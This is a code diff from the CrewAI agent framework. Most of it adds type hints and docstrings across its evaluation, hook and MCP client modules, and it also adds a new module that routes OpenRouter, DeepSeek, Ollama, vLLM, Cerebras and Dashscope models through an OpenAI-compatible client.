@@ -220,7 +291,13 @@ class EvaluationTraceCallback(BaseEventListener):
|
||||
|
||||
def on_llm_call_end(
|
||||
self, messages: str | list[dict[str, Any]] | None, response: Any
|
||||
):
|
||||
) -> None:
|
||||
"""Record an LLM call completion event.
|
||||
|
||||
Args:
|
||||
messages: The messages from the LLM call.
|
||||
response: The LLM response object.
|
||||
"""
|
||||
if not self.current_agent_id or not self.current_task_id:
|
||||
return
|
||||
|
||||
@@ -229,17 +306,18 @@ class EvaluationTraceCallback(BaseEventListener):
|
||||
return
|
||||
|
||||
total_tokens = 0
|
||||
if hasattr(response, "usage") and hasattr(response.usage, "total_tokens"):
|
||||
total_tokens = response.usage.total_tokens
|
||||
usage = getattr(response, "usage", None)
|
||||
if usage is not None:
|
||||
total_tokens = getattr(usage, "total_tokens", 0)
|
||||
|
||||
current_time = datetime.now()
|
||||
start_time = None
|
||||
if hasattr(self, "current_llm_call") and self.current_llm_call:
|
||||
start_time = self.current_llm_call.get("start_time")
|
||||
start_time = (
|
||||
self.current_llm_call.get("start_time") if self.current_llm_call else None
|
||||
)
|
||||
|
||||
if not start_time:
|
||||
start_time = current_time
|
||||
llm_call = {
|
||||
llm_call: dict[str, Any] = {
|
||||
"messages": messages,
|
||||
"response": response,
|
||||
"start_time": start_time,
|
||||
@@ -248,16 +326,28 @@ class EvaluationTraceCallback(BaseEventListener):
|
||||
}
|
||||
|
||||
self.traces[trace_key]["llm_calls"].append(llm_call)
|
||||
|
||||
if hasattr(self, "current_llm_call"):
|
||||
self.current_llm_call = {}
|
||||
self.current_llm_call = {}
|
||||
|
||||
def get_trace(self, agent_id: str, task_id: str) -> dict[str, Any] | None:
|
||||
"""Retrieve a trace by agent and task ID.
|
||||
|
||||
Args:
|
||||
agent_id: The agent's identifier.
|
||||
task_id: The task's identifier.
|
||||
|
||||
Returns:
|
||||
The trace dictionary, or None if not found.
|
||||
"""
|
||||
trace_key = f"{agent_id}_{task_id}"
|
||||
return self.traces.get(trace_key)
|
||||
|
||||
|
||||
def create_evaluation_callbacks() -> EvaluationTraceCallback:
|
||||
"""Create and register an evaluation trace callback on the event bus.
|
||||
|
||||
Returns:
|
||||
The configured EvaluationTraceCallback instance.
|
||||
"""
|
||||
from crewai.events.event_bus import crewai_event_bus
|
||||
|
||||
callback = EvaluationTraceCallback()
|
||||
|
||||
@@ -8,10 +8,10 @@ from crewai.experimental.evaluation.experiment.result import ExperimentResults
|
||||
|
||||
|
||||
class ExperimentResultsDisplay:
|
||||
def __init__(self):
|
||||
def __init__(self) -> None:
|
||||
self.console = Console()
|
||||
|
||||
def summary(self, experiment_results: ExperimentResults):
|
||||
def summary(self, experiment_results: ExperimentResults) -> None:
|
||||
total = len(experiment_results.results)
|
||||
passed = sum(1 for r in experiment_results.results if r.passed)
|
||||
|
||||
@@ -28,7 +28,9 @@ class ExperimentResultsDisplay:
|
||||
|
||||
self.console.print(table)
|
||||
|
||||
def comparison_summary(self, comparison: dict[str, Any], baseline_timestamp: str):
|
||||
def comparison_summary(
|
||||
self, comparison: dict[str, Any], baseline_timestamp: str
|
||||
) -> None:
|
||||
self.console.print(
|
||||
Panel(
|
||||
f"[bold]Comparison with baseline run from {baseline_timestamp}[/bold]",
|
||||
|
||||
@@ -6,7 +6,7 @@ from typing import TYPE_CHECKING, Any
|
||||
|
||||
from crewai.agents.agent_builder.base_agent import BaseAgent
|
||||
from crewai.experimental.evaluation import AgentEvaluator, create_default_evaluator
|
||||
from crewai.experimental.evaluation.evaluation_display import (
|
||||
from crewai.experimental.evaluation.base_evaluator import (
|
||||
AgentAggregatedEvaluationResult,
|
||||
)
|
||||
from crewai.experimental.evaluation.experiment.result import (
|
||||
|
||||
@@ -7,7 +7,8 @@ from typing import Any
|
||||
|
||||
def extract_json_from_llm_response(text: str) -> dict[str, Any]:
|
||||
try:
|
||||
return json.loads(text)
|
||||
result: dict[str, Any] = json.loads(text)
|
||||
return result
|
||||
except json.JSONDecodeError:
|
||||
pass
|
||||
|
||||
@@ -24,7 +25,8 @@ def extract_json_from_llm_response(text: str) -> dict[str, Any]:
|
||||
matches = re.findall(pattern, text, re.IGNORECASE | re.DOTALL)
|
||||
for match in matches:
|
||||
try:
|
||||
return json.loads(match.strip())
|
||||
parsed: dict[str, Any] = json.loads(match.strip())
|
||||
return parsed
|
||||
except json.JSONDecodeError: # noqa: PERF203
|
||||
continue
|
||||
raise ValueError("No valid JSON found in the response")
|
||||
|
||||
@@ -68,7 +68,7 @@ Evaluate how well the agent's output aligns with the assigned task goal.
|
||||
]
|
||||
if self.llm is None:
|
||||
raise ValueError("LLM must be initialized")
|
||||
response = self.llm.call(prompt) # type: ignore[arg-type]
|
||||
response = self.llm.call(prompt)
|
||||
|
||||
try:
|
||||
evaluation_data: dict[str, Any] = extract_json_from_llm_response(response)
|
||||
|
||||
@@ -224,7 +224,9 @@ Identify any inefficient reasoning patterns and provide specific suggestions for
|
||||
raw_response=response,
|
||||
)
|
||||
|
||||
def _detect_loops(self, llm_calls: list[dict]) -> tuple[bool, list[dict]]:
|
||||
def _detect_loops(
|
||||
self, llm_calls: list[dict[str, Any]]
|
||||
) -> tuple[bool, list[dict[str, Any]]]:
|
||||
loop_details = []
|
||||
|
||||
messages = []
|
||||
@@ -272,7 +274,9 @@ Identify any inefficient reasoning patterns and provide specific suggestions for
|
||||
|
||||
return intersection / union if union > 0 else 0.0
|
||||
|
||||
def _analyze_reasoning_patterns(self, llm_calls: list[dict]) -> dict[str, Any]:
|
||||
def _analyze_reasoning_patterns(
|
||||
self, llm_calls: list[dict[str, Any]]
|
||||
) -> dict[str, Any]:
|
||||
call_lengths = []
|
||||
response_times = []
|
||||
|
||||
@@ -345,7 +349,7 @@ Identify any inefficient reasoning patterns and provide specific suggestions for
|
||||
max_possible_slope = max(values) - min(values)
|
||||
if max_possible_slope > 0:
|
||||
normalized_slope = slope / max_possible_slope
|
||||
return max(min(normalized_slope, 1.0), -1.0)
|
||||
return float(max(min(normalized_slope, 1.0), -1.0))
|
||||
return 0.0
|
||||
except Exception:
|
||||
return 0.0
|
||||
@@ -384,7 +388,7 @@ Identify any inefficient reasoning patterns and provide specific suggestions for
|
||||
|
||||
return float(np.mean(indicators)) if indicators else 0.0
|
||||
|
||||
def _get_call_samples(self, llm_calls: list[dict]) -> str:
|
||||
def _get_call_samples(self, llm_calls: list[dict[str, Any]]) -> str:
|
||||
samples = []
|
||||
|
||||
if len(llm_calls) <= 6:
|
||||
|
||||
@@ -299,15 +299,15 @@ def _extract_all_methods_from_condition(
|
||||
return []
|
||||
if isinstance(condition, dict):
|
||||
conditions_list = condition.get("conditions", [])
|
||||
methods: list[str] = []
|
||||
dict_methods: list[str] = []
|
||||
for sub_cond in conditions_list:
|
||||
methods.extend(_extract_all_methods_from_condition(sub_cond))
|
||||
return methods
|
||||
dict_methods.extend(_extract_all_methods_from_condition(sub_cond))
|
||||
return dict_methods
|
||||
if isinstance(condition, list):
|
||||
methods = []
|
||||
list_methods: list[str] = []
|
||||
for item in condition:
|
||||
methods.extend(_extract_all_methods_from_condition(item))
|
||||
return methods
|
||||
list_methods.extend(_extract_all_methods_from_condition(item))
|
||||
return list_methods
|
||||
return []
|
||||
|
||||
|
||||
@@ -476,7 +476,8 @@ def _detect_flow_inputs(flow_class: type) -> list[str]:
|
||||
|
||||
# Check for inputs in __init__ signature beyond standard Flow params
|
||||
try:
|
||||
init_sig = inspect.signature(flow_class.__init__)
|
||||
init_method = flow_class.__init__ # type: ignore[misc]
|
||||
init_sig = inspect.signature(init_method)
|
||||
standard_params = {
|
||||
"self",
|
||||
"persistence",
|
||||
|
||||
@@ -83,8 +83,11 @@ def _serialize_llm_for_context(llm: Any) -> dict[str, Any] | str | None:
|
||||
subclasses). Falls back to extracting the model string with provider
|
||||
prefix for unknown LLM types.
|
||||
"""
|
||||
if hasattr(llm, "to_config_dict"):
|
||||
return llm.to_config_dict()
|
||||
to_config: Callable[[], dict[str, Any]] | None = getattr(
|
||||
llm, "to_config_dict", None
|
||||
)
|
||||
if to_config is not None:
|
||||
return to_config()
|
||||
|
||||
# Fallback for non-BaseLLM objects: just extract model + provider prefix
|
||||
model = getattr(llm, "model", None)
|
||||
@@ -371,8 +374,11 @@ def human_feedback(
|
||||
) -> Any:
|
||||
"""Recall past HITL lessons and use LLM to pre-review the output."""
|
||||
try:
|
||||
mem = flow_instance.memory
|
||||
if mem is None:
|
||||
return method_output
|
||||
query = f"human feedback lessons for {func.__name__}: {method_output!s}"
|
||||
matches = flow_instance.memory.recall(query, source=learn_source)
|
||||
matches = mem.recall(query, source=learn_source)
|
||||
if not matches:
|
||||
return method_output
|
||||
|
||||
@@ -404,6 +410,9 @@ def human_feedback(
|
||||
) -> None:
|
||||
"""Extract generalizable lessons from output + feedback, store in memory."""
|
||||
try:
|
||||
mem = flow_instance.memory
|
||||
if mem is None:
|
||||
return
|
||||
llm_inst = _resolve_llm_instance()
|
||||
prompt = _get_hitl_prompt("hitl_distill_user").format(
|
||||
method_name=func.__name__,
|
||||
@@ -435,7 +444,7 @@ def human_feedback(
|
||||
]
|
||||
|
||||
if lessons:
|
||||
flow_instance.memory.remember_many(lessons, source=learn_source)
|
||||
mem.remember_many(lessons, source=learn_source) # type: ignore[union-attr]
|
||||
except Exception: # noqa: S110
|
||||
pass # non-critical: don't fail the flow because lesson storage failed
|
||||
|
||||
|
||||
@@ -122,7 +122,7 @@ def before_llm_call(
|
||||
"""
|
||||
from crewai.hooks.llm_hooks import register_before_llm_call_hook
|
||||
|
||||
return _create_hook_decorator( # type: ignore[return-value]
|
||||
return _create_hook_decorator( # type: ignore[no-any-return]
|
||||
hook_type="llm",
|
||||
register_function=register_before_llm_call_hook,
|
||||
marker_attribute="is_before_llm_call_hook",
|
||||
@@ -176,7 +176,7 @@ def after_llm_call(
|
||||
"""
|
||||
from crewai.hooks.llm_hooks import register_after_llm_call_hook
|
||||
|
||||
return _create_hook_decorator( # type: ignore[return-value]
|
||||
return _create_hook_decorator( # type: ignore[no-any-return]
|
||||
hook_type="llm",
|
||||
register_function=register_after_llm_call_hook,
|
||||
marker_attribute="is_after_llm_call_hook",
|
||||
@@ -237,7 +237,7 @@ def before_tool_call(
|
||||
"""
|
||||
from crewai.hooks.tool_hooks import register_before_tool_call_hook
|
||||
|
||||
return _create_hook_decorator( # type: ignore[return-value]
|
||||
return _create_hook_decorator( # type: ignore[no-any-return]
|
||||
hook_type="tool",
|
||||
register_function=register_before_tool_call_hook,
|
||||
marker_attribute="is_before_tool_call_hook",
|
||||
@@ -293,7 +293,7 @@ def after_tool_call(
|
||||
"""
|
||||
from crewai.hooks.tool_hooks import register_after_tool_call_hook
|
||||
|
||||
return _create_hook_decorator( # type: ignore[return-value]
|
||||
return _create_hook_decorator( # type: ignore[no-any-return]
|
||||
hook_type="tool",
|
||||
register_function=register_after_tool_call_hook,
|
||||
marker_attribute="is_after_tool_call_hook",
|
||||
|
||||
@@ -13,7 +13,7 @@ class BaseKnowledgeSource(BaseModel, ABC):
|
||||
chunk_size: int = 4000
|
||||
chunk_overlap: int = 200
|
||||
chunks: list[str] = Field(default_factory=list)
|
||||
chunk_embeddings: list[np.ndarray] = Field(default_factory=list)
|
||||
chunk_embeddings: list[np.ndarray[Any, np.dtype[Any]]] = Field(default_factory=list)
|
||||
|
||||
model_config = ConfigDict(arbitrary_types_allowed=True)
|
||||
storage: KnowledgeStorage | None = Field(default=None)
|
||||
@@ -28,7 +28,7 @@ class BaseKnowledgeSource(BaseModel, ABC):
|
||||
def add(self) -> None:
|
||||
"""Process content, chunk it, compute embeddings, and save them."""
|
||||
|
||||
def get_embeddings(self) -> list[np.ndarray]:
|
||||
def get_embeddings(self) -> list[np.ndarray[Any, np.dtype[Any]]]:
|
||||
"""Return the list of embeddings for the chunks."""
|
||||
return self.chunk_embeddings
|
||||
|
||||
|
||||
@@ -309,6 +309,14 @@ SUPPORTED_NATIVE_PROVIDERS: Final[list[str]] = [
|
||||
"gemini",
|
||||
"bedrock",
|
||||
"aws",
|
||||
# OpenAI-compatible providers
|
||||
"openrouter",
|
||||
"deepseek",
|
||||
"ollama",
|
||||
"ollama_chat",
|
||||
"hosted_vllm",
|
||||
"cerebras",
|
||||
"dashscope",
|
||||
]
|
||||
|
||||
|
||||
@@ -368,6 +376,14 @@ class LLM(BaseLLM):
|
||||
"gemini": "gemini",
|
||||
"bedrock": "bedrock",
|
||||
"aws": "bedrock",
|
||||
# OpenAI-compatible providers
|
||||
"openrouter": "openrouter",
|
||||
"deepseek": "deepseek",
|
||||
"ollama": "ollama",
|
||||
"ollama_chat": "ollama_chat",
|
||||
"hosted_vllm": "hosted_vllm",
|
||||
"cerebras": "cerebras",
|
||||
"dashscope": "dashscope",
|
||||
}
|
||||
|
||||
canonical_provider = provider_mapping.get(prefix.lower())
|
||||
@@ -467,6 +483,29 @@ class LLM(BaseLLM):
|
||||
for prefix in ["gpt-", "gpt-35-", "o1", "o3", "o4", "azure-"]
|
||||
)
|
||||
|
||||
# OpenAI-compatible providers - accept any model name since these
|
||||
# providers host many different models with varied naming conventions
|
||||
if provider == "deepseek":
|
||||
return model_lower.startswith("deepseek")
|
||||
|
||||
if provider == "ollama" or provider == "ollama_chat":
|
||||
# Ollama accepts any local model name
|
||||
return True
|
||||
|
||||
if provider == "hosted_vllm":
|
||||
# vLLM serves any model
|
||||
return True
|
||||
|
||||
if provider == "cerebras":
|
||||
return True
|
||||
|
||||
if provider == "dashscope":
|
||||
return model_lower.startswith("qwen")
|
||||
|
||||
if provider == "openrouter":
|
||||
# OpenRouter uses org/model format but accepts anything
|
||||
return True
|
||||
|
||||
return False
|
||||
|
||||
@classmethod
|
||||
@@ -566,6 +605,23 @@ class LLM(BaseLLM):
|
||||
|
||||
return BedrockCompletion
|
||||
|
||||
# OpenAI-compatible providers
|
||||
openai_compatible_providers = {
|
||||
"openrouter",
|
||||
"deepseek",
|
||||
"ollama",
|
||||
"ollama_chat",
|
||||
"hosted_vllm",
|
||||
"cerebras",
|
||||
"dashscope",
|
||||
}
|
||||
if provider in openai_compatible_providers:
|
||||
from crewai.llms.providers.openai_compatible.completion import (
|
||||
OpenAICompatibleCompletion,
|
||||
)
|
||||
|
||||
return OpenAICompatibleCompletion
|
||||
|
||||
return None
|
||||
|
||||
def __init__(
|
||||
@@ -2313,8 +2369,8 @@ class LLM(BaseLLM):
|
||||
cb.strip() for cb in failure_callbacks_str.split(",") if cb.strip()
|
||||
]
|
||||
|
||||
litellm.success_callback = success_callbacks
|
||||
litellm.failure_callback = failure_callbacks
|
||||
litellm.success_callback = success_callbacks # type: ignore[assignment]
|
||||
litellm.failure_callback = failure_callbacks # type: ignore[assignment]
|
||||
|
||||
def __copy__(self) -> LLM:
|
||||
"""Create a shallow copy of the LLM instance."""
|
||||
|
||||
@@ -222,6 +222,7 @@ class AnthropicCompletion(BaseLLM):
|
||||
self.previous_thinking_blocks: list[ThinkingBlock] = []
|
||||
self.response_format = response_format
|
||||
# Tool search config
|
||||
self.tool_search: AnthropicToolSearchConfig | None
|
||||
if tool_search is True:
|
||||
self.tool_search = AnthropicToolSearchConfig()
|
||||
elif isinstance(tool_search, AnthropicToolSearchConfig):
|
||||
|
||||
@@ -0,0 +1,14 @@
|
||||
"""OpenAI-compatible providers module."""
|
||||
|
||||
from crewai.llms.providers.openai_compatible.completion import (
|
||||
OPENAI_COMPATIBLE_PROVIDERS,
|
||||
OpenAICompatibleCompletion,
|
||||
ProviderConfig,
|
||||
)
|
||||
|
||||
|
||||
__all__ = [
|
||||
"OPENAI_COMPATIBLE_PROVIDERS",
|
||||
"OpenAICompatibleCompletion",
|
||||
"ProviderConfig",
|
||||
]
|
||||
@@ -0,0 +1,282 @@
|
||||
"""OpenAI-compatible providers implementation.
|
||||
|
||||
This module provides a thin subclass of OpenAICompletion that supports
|
||||
various OpenAI-compatible APIs like OpenRouter, DeepSeek, Ollama, vLLM,
|
||||
Cerebras, and Dashscope (Alibaba/Qwen).
|
||||
|
||||
Usage:
|
||||
llm = LLM(model="deepseek/deepseek-chat") # Uses DeepSeek API
|
||||
llm = LLM(model="openrouter/anthropic/claude-3-opus") # Uses OpenRouter
|
||||
llm = LLM(model="ollama/llama3") # Uses local Ollama
|
||||
"""
|
||||
|
||||
from __future__ import annotations
|
||||
|
||||
from dataclasses import dataclass, field
|
||||
import os
|
||||
from typing import Any
|
||||
|
||||
from crewai.llms.providers.openai.completion import OpenAICompletion
|
||||
|
||||
|
||||
@dataclass(frozen=True)
|
||||
class ProviderConfig:
|
||||
"""Configuration for an OpenAI-compatible provider.
|
||||
|
||||
Attributes:
|
||||
base_url: Default base URL for the provider's API endpoint.
|
||||
api_key_env: Environment variable name for the API key.
|
||||
base_url_env: Environment variable name for a custom base URL override.
|
||||
default_headers: HTTP headers to include in all requests.
|
||||
api_key_required: Whether an API key is required for this provider.
|
||||
default_api_key: Default API key to use if none is provided and not required.
|
||||
"""
|
||||
|
||||
base_url: str
|
||||
api_key_env: str
|
||||
base_url_env: str | None = None
|
||||
default_headers: dict[str, str] = field(default_factory=dict)
|
||||
api_key_required: bool = True
|
||||
default_api_key: str | None = None
|
||||
|
||||
|
||||
OPENAI_COMPATIBLE_PROVIDERS: dict[str, ProviderConfig] = {
|
||||
"openrouter": ProviderConfig(
|
||||
base_url="https://openrouter.ai/api/v1",
|
||||
api_key_env="OPENROUTER_API_KEY",
|
||||
base_url_env="OPENROUTER_BASE_URL",
|
||||
default_headers={"HTTP-Referer": "https://crewai.com"},
|
||||
api_key_required=True,
|
||||
),
|
||||
"deepseek": ProviderConfig(
|
||||
base_url="https://api.deepseek.com/v1",
|
||||
api_key_env="DEEPSEEK_API_KEY",
|
||||
base_url_env="DEEPSEEK_BASE_URL",
|
||||
api_key_required=True,
|
||||
),
|
||||
"ollama": ProviderConfig(
|
||||
base_url="http://localhost:11434/v1",
|
||||
api_key_env="OLLAMA_API_KEY",
|
||||
base_url_env="OLLAMA_HOST",
|
||||
api_key_required=False,
|
||||
default_api_key="ollama",
|
||||
),
|
||||
"ollama_chat": ProviderConfig(
|
||||
base_url="http://localhost:11434/v1",
|
||||
api_key_env="OLLAMA_API_KEY",
|
||||
base_url_env="OLLAMA_HOST",
|
||||
api_key_required=False,
|
||||
default_api_key="ollama",
|
||||
),
|
||||
"hosted_vllm": ProviderConfig(
|
||||
base_url="http://localhost:8000/v1",
|
||||
api_key_env="VLLM_API_KEY",
|
||||
base_url_env="VLLM_BASE_URL",
|
||||
api_key_required=False,
|
||||
default_api_key="dummy",
|
||||
),
|
||||
"cerebras": ProviderConfig(
|
||||
base_url="https://api.cerebras.ai/v1",
|
||||
api_key_env="CEREBRAS_API_KEY",
|
||||
base_url_env="CEREBRAS_BASE_URL",
|
||||
api_key_required=True,
|
||||
),
|
||||
"dashscope": ProviderConfig(
|
||||
base_url="https://dashscope-intl.aliyuncs.com/compatible-mode/v1",
|
||||
api_key_env="DASHSCOPE_API_KEY",
|
||||
base_url_env="DASHSCOPE_BASE_URL",
|
||||
api_key_required=True,
|
||||
),
|
||||
}
|
||||
|
||||
|
||||
def _normalize_ollama_base_url(base_url: str) -> str:
|
||||
"""Normalize Ollama base URL to ensure it ends with /v1.
|
||||
|
||||
Ollama uses OLLAMA_HOST which may not include the /v1 suffix,
|
||||
but the OpenAI-compatible endpoint requires it.
|
||||
|
||||
Args:
|
||||
base_url: The base URL, potentially without /v1 suffix.
|
||||
|
||||
Returns:
|
||||
The base URL with /v1 suffix if needed.
|
||||
"""
|
||||
base_url = base_url.rstrip("/")
|
||||
if not base_url.endswith("/v1"):
|
||||
return f"{base_url}/v1"
|
||||
return base_url
|
||||
|
||||
|
||||
class OpenAICompatibleCompletion(OpenAICompletion):
|
||||
"""OpenAI-compatible completion implementation.
|
||||
|
||||
This class provides support for various OpenAI-compatible APIs by
|
||||
automatically configuring the base URL, API key, and headers based
|
||||
on the provider name.
|
||||
|
||||
Supported providers:
|
||||
- openrouter: OpenRouter (https://openrouter.ai)
|
||||
- deepseek: DeepSeek (https://deepseek.com)
|
||||
- ollama: Ollama local server (https://ollama.ai)
|
||||
- ollama_chat: Alias for ollama
|
||||
- hosted_vllm: vLLM server (https://github.com/vllm-project/vllm)
|
||||
- cerebras: Cerebras (https://cerebras.ai)
|
||||
- dashscope: Alibaba Dashscope/Qwen (https://dashscope.aliyun.com)
|
||||
|
||||
Example:
|
||||
# Using provider prefix
|
||||
llm = LLM(model="deepseek/deepseek-chat")
|
||||
|
||||
# Using explicit provider parameter
|
||||
llm = LLM(model="llama3", provider="ollama")
|
||||
|
||||
# With custom configuration
|
||||
llm = LLM(
|
||||
model="deepseek-chat",
|
||||
provider="deepseek",
|
||||
api_key="my-key",
|
||||
temperature=0.7
|
||||
)
|
||||
"""
|
||||
|
||||
def __init__(
|
||||
self,
|
||||
model: str,
|
||||
provider: str,
|
||||
api_key: str | None = None,
|
||||
base_url: str | None = None,
|
||||
default_headers: dict[str, str] | None = None,
|
||||
**kwargs: Any,
|
||||
) -> None:
|
||||
"""Initialize OpenAI-compatible completion client.
|
||||
|
||||
Args:
|
||||
model: The model identifier.
|
||||
provider: The provider name (must be in OPENAI_COMPATIBLE_PROVIDERS).
|
||||
api_key: Optional API key override. If not provided, uses the
|
||||
provider's configured environment variable.
|
||||
base_url: Optional base URL override. If not provided, uses the
|
||||
provider's configured default or environment variable.
|
||||
default_headers: Optional headers to merge with provider defaults.
|
||||
**kwargs: Additional arguments passed to OpenAICompletion.
|
||||
|
||||
Raises:
|
||||
ValueError: If the provider is not supported or required API key
|
||||
is missing.
|
||||
"""
|
||||
config = OPENAI_COMPATIBLE_PROVIDERS.get(provider)
|
||||
if config is None:
|
||||
supported = ", ".join(sorted(OPENAI_COMPATIBLE_PROVIDERS.keys()))
|
||||
raise ValueError(
|
||||
f"Unknown OpenAI-compatible provider: {provider}. "
|
||||
f"Supported providers: {supported}"
|
||||
)
|
||||
|
||||
resolved_api_key = self._resolve_api_key(api_key, config, provider)
|
||||
resolved_base_url = self._resolve_base_url(base_url, config, provider)
|
||||
resolved_headers = self._resolve_headers(default_headers, config)
|
||||
|
||||
super().__init__(
|
||||
model=model,
|
||||
provider=provider,
|
||||
api_key=resolved_api_key,
|
||||
base_url=resolved_base_url,
|
||||
default_headers=resolved_headers,
|
||||
**kwargs,
|
||||
)
|
||||
|
||||
def _resolve_api_key(
|
||||
self,
|
||||
api_key: str | None,
|
||||
config: ProviderConfig,
|
||||
provider: str,
|
||||
) -> str | None:
|
||||
"""Resolve the API key from explicit value, env var, or default.
|
||||
|
||||
Args:
|
||||
api_key: Explicitly provided API key.
|
||||
config: Provider configuration.
|
||||
provider: Provider name for error messages.
|
||||
|
||||
Returns:
|
||||
The resolved API key.
|
||||
|
||||
Raises:
|
||||
ValueError: If API key is required but not found.
|
||||
"""
|
||||
if api_key:
|
||||
return api_key
|
||||
|
||||
env_key = os.getenv(config.api_key_env)
|
||||
if env_key:
|
||||
return env_key
|
||||
|
||||
if config.api_key_required:
|
||||
raise ValueError(
|
||||
f"API key required for {provider}. "
|
||||
f"Set {config.api_key_env} environment variable or pass api_key parameter."
|
||||
)
|
||||
|
||||
return config.default_api_key
|
||||
|
||||
def _resolve_base_url(
|
||||
self,
|
||||
base_url: str | None,
|
||||
config: ProviderConfig,
|
||||
provider: str,
|
||||
) -> str:
|
||||
"""Resolve the base URL from explicit value, env var, or default.
|
||||
|
||||
Args:
|
||||
base_url: Explicitly provided base URL.
|
||||
config: Provider configuration.
|
||||
provider: Provider name (used for special handling like Ollama).
|
||||
|
||||
Returns:
|
||||
The resolved base URL.
|
||||
"""
|
||||
if base_url:
|
||||
resolved = base_url
|
||||
elif config.base_url_env:
|
||||
resolved = os.getenv(config.base_url_env, config.base_url)
|
||||
else:
|
||||
resolved = config.base_url
|
||||
|
||||
if provider in ("ollama", "ollama_chat"):
|
||||
resolved = _normalize_ollama_base_url(resolved)
|
||||
|
||||
return resolved
|
||||
|
||||
def _resolve_headers(
|
||||
self,
|
||||
headers: dict[str, str] | None,
|
||||
config: ProviderConfig,
|
||||
) -> dict[str, str] | None:
|
||||
"""Merge user headers with provider default headers.
|
||||
|
||||
Args:
|
||||
headers: User-provided headers.
|
||||
config: Provider configuration.
|
||||
|
||||
Returns:
|
||||
Merged headers dict, or None if empty.
|
||||
"""
|
||||
if not config.default_headers and not headers:
|
||||
return None
|
||||
|
||||
merged = dict(config.default_headers)
|
||||
if headers:
|
||||
merged.update(headers)
|
||||
|
||||
return merged if merged else None
|
||||
|
||||
def supports_function_calling(self) -> bool:
|
||||
"""Check if the provider supports function calling.
|
||||
|
||||
All modern OpenAI-compatible providers support function calling.
|
||||
|
||||
Returns:
|
||||
True, as all supported providers have function calling support.
|
||||
"""
|
||||
return True
|
||||
@@ -1,22 +1,21 @@
|
||||
"""MCP client with session management for CrewAI agents."""
|
||||
|
||||
import asyncio
|
||||
from collections.abc import Callable
|
||||
from collections.abc import Callable, Coroutine
|
||||
from contextlib import AsyncExitStack
|
||||
from datetime import datetime
|
||||
import logging
|
||||
import sys
|
||||
import time
|
||||
from typing import Any, NamedTuple
|
||||
from typing import Any, NamedTuple, TypeVar
|
||||
|
||||
from typing_extensions import Self
|
||||
|
||||
|
||||
# BaseExceptionGroup is available in Python 3.11+
|
||||
try:
|
||||
if sys.version_info >= (3, 11):
|
||||
from builtins import BaseExceptionGroup
|
||||
except ImportError:
|
||||
# Fallback for Python < 3.11 (shouldn't happen in practice)
|
||||
BaseExceptionGroup = Exception
|
||||
else:
|
||||
from exceptiongroup import BaseExceptionGroup
|
||||
|
||||
from crewai.events.event_bus import crewai_event_bus
|
||||
from crewai.events.types.mcp_events import (
|
||||
@@ -47,8 +46,10 @@ MCP_TOOL_EXECUTION_TIMEOUT = 30
|
||||
MCP_DISCOVERY_TIMEOUT = 30 # Increased for slow servers
|
||||
MCP_MAX_RETRIES = 3
|
||||
|
||||
_T = TypeVar("_T")
|
||||
|
||||
# Simple in-memory cache for MCP tool schemas (duration: 5 minutes)
|
||||
_mcp_schema_cache: dict[str, tuple[dict[str, Any], float]] = {}
|
||||
_mcp_schema_cache: dict[str, tuple[list[dict[str, Any]], float]] = {}
|
||||
_cache_ttl = 300 # 5 minutes
|
||||
|
||||
|
||||
@@ -134,11 +135,7 @@ class MCPClient:
|
||||
else:
|
||||
server_name = "Unknown MCP Server"
|
||||
server_url = None
|
||||
transport_type = (
|
||||
self.transport.transport_type.value
|
||||
if hasattr(self.transport, "transport_type")
|
||||
else None
|
||||
)
|
||||
transport_type = self.transport.transport_type.value
|
||||
|
||||
return server_name, server_url, transport_type
|
||||
|
||||
@@ -542,7 +539,7 @@ class MCPClient:
|
||||
Returns:
|
||||
Cleaned arguments ready for MCP server.
|
||||
"""
|
||||
cleaned = {}
|
||||
cleaned: dict[str, Any] = {}
|
||||
|
||||
for key, value in arguments.items():
|
||||
# Skip None values
|
||||
@@ -686,9 +683,9 @@ class MCPClient:
|
||||
|
||||
async def _retry_operation(
|
||||
self,
|
||||
operation: Callable[[], Any],
|
||||
operation: Callable[[], Coroutine[Any, Any, _T]],
|
||||
timeout: int | None = None,
|
||||
) -> Any:
|
||||
) -> _T:
|
||||
"""Retry an operation with exponential backoff.
|
||||
|
||||
Args:
|
||||
|
||||
@@ -23,6 +23,7 @@ from crewai.mcp.config import (
|
||||
MCPServerSSE,
|
||||
MCPServerStdio,
|
||||
)
|
||||
from crewai.mcp.transports.base import BaseTransport
|
||||
from crewai.mcp.transports.http import HTTPTransport
|
||||
from crewai.mcp.transports.sse import SSETransport
|
||||
from crewai.mcp.transports.stdio import StdioTransport
|
||||
@@ -285,6 +286,7 @@ class MCPToolResolver:
|
||||
independent transport so that parallel tool executions never share
|
||||
state.
|
||||
"""
|
||||
transport: BaseTransport
|
||||
if isinstance(mcp_config, MCPServerStdio):
|
||||
transport = StdioTransport(
|
||||
command=mcp_config.command,
|
||||
|
||||
@@ -2,11 +2,17 @@
|
||||
|
||||
from abc import ABC, abstractmethod
|
||||
from enum import Enum
|
||||
from typing import Any, Protocol
|
||||
from typing import Any
|
||||
|
||||
from anyio.streams.memory import MemoryObjectReceiveStream, MemoryObjectSendStream
|
||||
from mcp.shared.message import SessionMessage
|
||||
from typing_extensions import Self
|
||||
|
||||
|
||||
MCPReadStream = MemoryObjectReceiveStream[SessionMessage | Exception]
|
||||
MCPWriteStream = MemoryObjectSendStream[SessionMessage]
|
||||
|
||||
|
||||
class TransportType(str, Enum):
|
||||
"""MCP transport types."""
|
||||
|
||||
@@ -16,22 +22,6 @@ class TransportType(str, Enum):
|
||||
SSE = "sse"
|
||||
|
||||
|
||||
class ReadStream(Protocol):
|
||||
"""Protocol for read streams."""
|
||||
|
||||
async def read(self, n: int = -1) -> bytes:
|
||||
"""Read bytes from stream."""
|
||||
...
|
||||
|
||||
|
||||
class WriteStream(Protocol):
|
||||
"""Protocol for write streams."""
|
||||
|
||||
async def write(self, data: bytes) -> None:
|
||||
"""Write bytes to stream."""
|
||||
...
|
||||
|
||||
|
||||
class BaseTransport(ABC):
|
||||
"""Base class for MCP transport implementations.
|
||||
|
||||
@@ -46,8 +36,8 @@ class BaseTransport(ABC):
|
||||
Args:
|
||||
**kwargs: Transport-specific configuration options.
|
||||
"""
|
||||
self._read_stream: ReadStream | None = None
|
||||
self._write_stream: WriteStream | None = None
|
||||
self._read_stream: MCPReadStream | None = None
|
||||
self._write_stream: MCPWriteStream | None = None
|
||||
self._connected = False
|
||||
|
||||
@property
|
||||
@@ -62,14 +52,14 @@ class BaseTransport(ABC):
|
||||
return self._connected
|
||||
|
||||
@property
|
||||
def read_stream(self) -> ReadStream:
|
||||
def read_stream(self) -> MCPReadStream:
|
